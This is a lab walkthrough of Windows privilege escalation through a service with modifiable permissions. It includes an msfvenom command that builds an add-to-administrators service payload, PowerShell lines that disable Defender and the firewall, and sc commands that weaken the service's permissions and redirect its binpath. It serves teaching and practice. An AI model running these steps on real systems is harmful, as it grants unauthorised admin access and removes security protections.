Windows Privilege Escalation
Using WinPeas
Making use of an exe that is vulnerable to unquoted service paths
Target Windows machine has a non-privileged user: localuser
Use MSFVenom: Generate an executable to push the localuser to the administrators group (ASCService.exe)
1 . Generate Payload using MSFVenom
#Generate the malicious exe
msfvenom -p windows/exec CMD='net localgroup administrators localuser /add' -f exe-service -o ASCService.exe

2. Start Web Server on Attack Machine
// python server
python3 -m http.server
3. Disable Windows Defender & Firewall on Victim Windows Machine
Run the following as powershell administrators
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -MAPSReporting 0
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
4. Connect back to Attack Machine on Windows Victim via browser

Navigate and download the payloads

move these downloads to the C:/ folder
Next we will need to add permissions so that the local users are able to start and stop the service. This is how we simulate excessive permissions on a service.
# Run cmd as administrator
sc sdset AdvancedSystemCareService9 D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
You should see a response of [SC] SetServiceObjectSecurity SUCCESS.
Run Command Prompt as Different User
Search cmd > right click > run as diff user
Check which accounts are in local administrators group
C:\ > net localgroup administrators

Run WinPeas.exe

Run check for services information
C:/> WINpeasX64.exe CMD servicesinfo

A few sections often used for privilege escalation are the
Interesting Services -non Microsoft-
Modifiable Services sections.
Now query the service using
sc qc AdvancedSystemCareService9
#This service runs as LocalSystem
Next attempt to start and stop the service using:
net stop AdvancedSystemCareService9
Now we try to modify the service binpath to point to our new executable. Add a new additional user:
sc config AdvancedSystemCareService9 binpath= "c:\ASCService.exe"
Now start our payload executable:
net start AdvancedSystemCareService9
Since we have permissions and can modify the service itself, we leverage the service to add the localuser to the local admin group
net localgroup administrators
Last updated